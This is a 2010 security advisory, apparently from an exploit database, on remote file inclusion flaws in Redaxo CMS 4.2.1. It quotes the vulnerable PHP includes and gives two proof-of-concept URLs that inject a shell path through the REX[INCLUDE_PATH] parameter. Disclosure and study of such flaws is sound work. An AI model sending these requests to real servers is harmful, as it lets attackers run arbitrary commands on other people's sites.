Redaxo 4.2.1 Remote File Inclusion Vulnerabilities

2010.04.26
Credit: eidelweiss
Risk: High
Local: No
Remote: Yes
CWE: CWE-94

Multiple vulnerabilities have been identified in Redaxo, which could be exploited by attackers to compromise a vulnerable system. These issues are caused by input validation errors in the "include/addons/version/pages/index.inc.php" and "include/pages/specials.inc.php" scripts when processing the "REX[INCLUDE_PATH]" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server. ======================================================================== Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability ======================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.redaxo.de Download: http://www.redaxo.de/files/redaxo4_2_1.zip Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber sp3x (securityreason) get-well brother Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/redaxo-cms-421-remote-file-inclusion.html ======================================================================== Description: So soll ein Content-Management-System sein. REDAXO vereint hohe Flexibilitt mit einfacher Handhabung fr sinnvolle Nutzung. Es eignet sich sowohl fr kleinere Auftritte als auch fr groe und komplexe Internetportale. Dank des modularen Aufbaus und der vielen Erweiterungsmglichkeiten deckt REDAXO alle erforderlichen Funktionalitten eines umfassenden Redaktionssystems ab. Zustzlich ist REDAXO ein Open-Source-System und somit kostenlos und kommerziell frei verwendbar. ======================================================================== -=[ VULN C0de ]=- ************************************************** [-] redaxo/include/pages/specials.inc.php ************************************************** // -------------- Defaults $subpage = rex_request('subpage', 'string'); $func = rex_request('func', 'string'); // -------------- Header $subline = array( array( '', $I18N->msg('main_preferences')), array( 'lang', $I18N->msg('languages')), ); rex_title($I18N->msg('specials'),$subline); switch($subpage) { case 'lang': $file = 'specials.clangs.inc.php'; break; default : $file = 'specials.settings.inc.php'; break; } require $REX['INCLUDE_PATH'].'/pages/'.$file; ************************************************** [-] redaxo/include/addons/version/pages/index.inc.php ************************************************** require $REX['INCLUDE_PATH'].'/layout/top.php'; rex_title('Version AddOn'); ?> <div class="rex-addon-output"> <h2 class="rex-hl2"><?php echo $I18N_A461->msg('code_for_module_input'); ?></h2> <div class="rex-addon-content"> <p class="rex-tx1"><?php echo $I18N_A461->msg('module_intro_help'); ?></p> <p class="rex-tx1"><?php echo $I18N_A461->msg('module_rights'); ?></p> </div> </div> <?php require $REX['INCLUDE_PATH'].'/layout/bottom.php'; ======================================================================== -=[ P0C ]=- http://127.0.0.1/redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll] http://127.0.0.1/redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=================================

References:

http://www.vupen.com/english/advisories/2010/0942
http://secunia.com/advisories/39492
http://xforce.iss.net/xforce/xfdb/26887
http://www.exploit-db.com/exploits/12276
http://www.securityfocus.com/bid/39549
http://securityreason.com/exploitalert/8129
http://eidelweiss-advisories.blogspot.com/2010/04/redaxo-cms-421-remote-file-inclusion.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top